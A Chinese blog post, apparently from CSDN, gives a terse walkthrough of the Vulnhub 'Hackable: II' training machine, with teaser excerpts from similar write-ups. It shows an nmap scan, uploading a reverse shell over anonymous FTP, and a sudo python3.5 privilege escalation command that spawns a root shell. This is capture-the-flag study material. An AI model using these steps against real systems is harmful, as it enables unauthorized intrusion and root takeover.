Vulnhub: Hackable:II靶机

最新推荐文章于 2024-11-04 22:38:56 发布
最新推荐文章于 2024-11-04 22:38:56 发布
阅读量261 收藏
点赞数
文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/131669109
版权

kali:192.168.111.111

靶机:192.168.111.142

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.142

网站的files目录

ftp存在匿名登录,所在目录为网站的files目录

ftp上传反弹shell

提权

目标根目录下的.runme.sh

md5解密后切换到shrek用户

shrek的sudo权限

提权方法:https://gtfobins.github.io/gtfobins/python/#sudo

提升为root

sudo -u root /usr/bin/python3.5 -c 'import os;os.system("/bin/bash")'

ctostm
关注
vulnhub--Hackable: II
venu_s的博客
06-30 316
靶机介绍 difficult:easy download:https://www.vulnhub.com/entry/hackable-ii,711/ 信息探测 还是常规的进行主机发现、端口扫描和目录扫描,尽可能的收集信息 主机发现 端口扫描 开放了21,22,80端口,其中21端口可以使用anonymous身份进行登录 目录扫描 有一个/files目录 访问80端口,是一个Apache的默认页面 查看网页源代码,提示进行目录扫描,已经扫描过了 访问/files,有一个CALL.html文件 内容
Hackable II靶机
logan_logan的博客
07-17 439
1.使用nmap端口扫描 端口扫描时发现开启了ftp服务,并且可以匿名登录; 2.匿名登录FTP服务 经过测试,可以上传和下载文件; 3.使用nikto工具进行扫描 得到了一个/files目录,在网页打开; 4.网页打开files这个目录; 在网页打开之后发现与之前FTP登录时看到的文件一致, 5.上传PHP文件,反弹shell 在kali里面使用nc监听端口,成功获取shell; 6.切换到home目录下找到一个important.txt文件 查看之后提示我们运行runme.sh文件; 7.运
VulnHub_HACKABLE: II靶机
学术渣渣的博客
08-23 482
文章目录靶机介绍渗透过程ip地址扫描端口扫描访问ftp制作php反弹shell脚本上传脚本nc监听脚本中记录的端口访问脚本网站获取shell提权 靶机介绍 下载地址:https://www.vulnhub.com/entry/hackable-ii,711/ 难度:简单 渗透过程 ip地址扫描 我们通过设置桥接模式,能够用arp-scan搜索同一局域网中的活跃主机。这里,我们得到靶机的ip是192.168.1.106。 arp-scan -l 端口扫描 对靶机进行端口扫描,可以看到这里有三个端口:21,
Vulnhub-HACKABLE: II渗透
laoyanCZ的博客
01-07 1204
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
vulnhub-HACKABLE: II
qq_43006864的博客
04-22 3278
攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 靶机
靶机练习 No.24 Vulnhub靶机hackable-ii ftp匿名访问+上传马+网页运行 反弹shell sudo python3.5提权
YouthBelief的博客
02-16 2794
靶机练习 No.24 Vulnhub靶机hackableII0x00 环境安装0x01 信息收集步骤一:ip探测步骤二:端口服务识别0x02 漏洞挖掘思路一:ftp 匿名访问思路二:80 http服务挖掘思路三:ssh爆破步骤一:ftp匿名访问(成功)(1) 匿名登录(2)查看内容步骤二:80http探测(1)访问首页(2)查看源码 有没有隐藏信息(3)目录扫描(4)查看files页面步骤三:ftp上传马(1)查看ftp是否拥有写权限(2)上传 kali自带的php反弹shell的马(3)kali开启监听,
Hackable: II靶场测试
zhongyuekang820的博客
10-22 1243
例如,在正常情况下,为了安全,应该禁止匿名用户的写入权限,特别是禁止上传可执行脚本(如一句话木马这种恶意脚本)。虽然匿名登录在一定程度上是一种正常的功能,但如果匿名用户被赋予了过度的权限(如上传可执行的恶意代码),就相当于未授权的恶意用户可以利用这个权限进行攻击。:像vsftpd2.3.4版本可能存在FTP(匿名登录)未授权访问漏洞,如果服务器是这个版本且没有进行相关安全修复,攻击者就可能利用匿名登录功能上传一句话木马等恶意文件,从而进一步进行恶意操作,如获取服务器控制权等。
VULNHUB靶机渗透——hackable2
aarong的博客
12-20 2119
前言 可能很多人在进行靶机渗透的时候会出现扫描不出靶机IP的情况,这里是靶机的网络配置没有设置好,设定跟你的虚拟网卡一致就可以了,具体参考这篇文章和这篇文章。 渗透过程 网络拓扑:攻击机和靶机同是NAT模式 (1)arp-scan -l扫描本地主机IP 这里根据MAC地址的不同判断出192.168.65.133为靶机IP地址 (2)Nmap扫描 nmap -A -T4 -p 1-65535 192.168.65.133 这里发现靶机开放了21 22 80三个端口,而且21端口是允许匿名登录的,等会直接
Vulnhub靶机hackableII
qq_48904485的博客
02-12 463
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机hackableII(10.0.2.52)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hackable-ii,711/
靶机渗透练习15-Hackable II
hirak0的博客
04-15 1019
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackable-ii,711/ Description difficulty: easy This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.6 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如
Hackable6:来源可破解 #6
06-08
【标题】"Hackable6:来源可破解 #6" 指的是第六期的"Hackable"杂志,这是一份专注于技术破解、开源硬件和DIY电子项目的出版物。在这个特定的版本中,他们分享了第六期内容的源代码和项目文件,允许读者深入研究并...
Hackable9:资料来源可入侵#9
04-28
Hackable》杂志#9的来源和文件 该存储库包含第九期的草图: WSmatrix44ok/ :电视模拟器的完整Arduino草图,其中.h包含使用FFMPEG从视频中提取的图像, script_images/go.sh :用于从包含用FFMPEG提取的图像...
HACKABLE: III实战演练
龙狼刺的博客
05-24 674
Hackable III
ICT网络赛道安全考点知识总结4
m0_72765822的博客
11-04 550
RADIUS和HWTACACS协议通常都使用共享密钥对传输的用户信息进行加密,以确保安全传输。 用来封装EAP报文的RADIUS属性通常是"EAP-Message",它用于传输EAP认证过程中的消息。 LDAP的域名属性通常是"DC"(Domain Component),用于表示域名的组成部分。 BFD(Bidirectional Forwarding Detection)可以用于检测网络设备之间直连物理链路的双向转发路径的故障,但也可以用于检测其他类型的链路故障。 管理员为虚拟系统手工分配资源时,
挂钩图像分割安全状态与危险状态识别系统:更新创新流程
lzmlzm89的博客
11-02 891
数据集信息展示在本研究中,我们使用了名为“test1”的数据集,以支持改进YOLOv8-seg的挂钩图像分割安全状态与危险状态识别系统的训练与验证。该数据集专门设计用于处理与安全相关的图像分类任务,旨在提高系统对不同安全状态的识别能力,从而为实际应用提供更为精准的安全监测解决方案。“test1”数据集包含三种主要类别,分别为“安全状态”、“危险状态_1”和“危险状态_2”。这些类别的选择反映了在实际应用中可能遇到的多样化安全场景,能够有效地模拟和识别不同的安全与危险状态。
【论文速读】| APILOT:通过避开过时API陷阱,引导大语言模型生成安全代码
m0_73736695的博客
11-01 1162
论文提出了一种名为APILOT的系统,它通过实时更新过时API的数据集,并结合增强生成方法,引导LLMs生成版本感知的安全代码。
如何在Linux系统中使用SSH进行安全连接
qq_36287830的博客
10-30 533
SSH是一个网络协议,用于计算机之间的安全登录以及命令执行,此外还允许进行安全的数据传输。通过本文,你已经学习了如何在Linux系统中使用SSH进行安全连接。我们介绍了SSH的基本概念、安装方法、启动SSH服务、验证安装、SSH配置、SSH客户端、SSH密钥认证、使用SSH隧道、SSH端口转发、使用SSH代理、SSH环境变量、SSH日志、SSH守护进程选项、使用SSH密钥管理工具、使用SSH证书、使用SSH网关、SSH的高级特性等内容。
高级Python自动化运维:容器安全与网络策略的深度解析
最新发布
weixin_52392194的博客
11-04 941
网络策略是用来定义Pod间通信的规则。通过制定网络策略,可以限制特定Pod的入站和出站流量。Kubernetes中的NetworkPolicy是实现这一目标的主要工具。
2024年【危险化学品经营单位安全管理人员】试题及解析及危险化学品经营单位安全管理人员作业考试题库
weixin_53351316的博客
11-01 515
在危险化学品经营单位中,安全管理人员的职责至关重要。他们不仅需要掌握全面的安全知识,还需要通过严格的考试来验证其专业能力。为了帮助广大考生顺利通过考试,安全生产模拟考试一点通平台发布了2024年危险化学品经营单位安全管理人员试题及解析。以下是精心挑选的十道试题,带解析及答案,同时我们也会简要介绍全国各省安全员C证题库的相关情况。
报错Writable folder /var/www/html/DVWA/hackable/uploads/: No 和Writable folder /var/www/html/DVWA/config: No怎么办?
07-25
ls -l /var/www/html/DVWA/hackable/uploads/ ls -l /var/www/html/DVWA/config ``` 2. 检查输出结果中的权限列。如果权限列中没有 "w"(写入权限),则表示相应文件夹没有写入权限。 3. 为这两个文件夹设置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值